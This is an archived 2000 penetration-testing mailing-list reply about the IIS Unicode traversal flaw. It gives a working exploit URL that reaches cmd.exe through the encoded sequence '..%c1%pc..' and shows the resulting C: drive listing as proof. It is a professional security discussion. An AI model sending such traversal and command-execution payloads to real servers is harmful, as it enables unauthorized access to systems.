Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Tue, 31 Oct 2000 15:13:31 -0800
Vitaly Osipov [vos () TELENOR CZ] wrote: Hmm... I see some *very* strange strings in you examples below... the second excaped symbol (%pc for example) is not real escaped hex-code -if it works, then the problem is not in Unicode at all, but in something else --------------------------- Trust Me, It Works!!! Which is interesting since at least one system reported as patched appears to be still vulnerable. I had assumed the admin either didn't patch, or used the wrong hotfix. Perhaps that is not the case... The Proof is in the Pudding: ---------------------------- http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ Directory of c:\ 06/23/00 01:38p 0 AUTOEXEC.BAT 06/23/00 01:38p 0 CONFIG.SYS 06/23/00 01:40p <DIR> Dell 06/26/00 03:29p <DIR> INetPub 06/26/00 02:10p <DIR> MSSQL7 06/26/00 01:40p <DIR> Multimedia Files 06/26/00 03:14p <DIR> My Installations 06/27/00 01:05p <DIR> Program Files 06/30/00 09:00a <DIR> TEMP 07/10/00 11:42a <DIR> WINNT -mch __________________________________________________ Do You Yahoo!?
From homework help to love advice, Yahoo! Experts has your answer.
http://experts.yahoo.com/
Current thread:
- Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)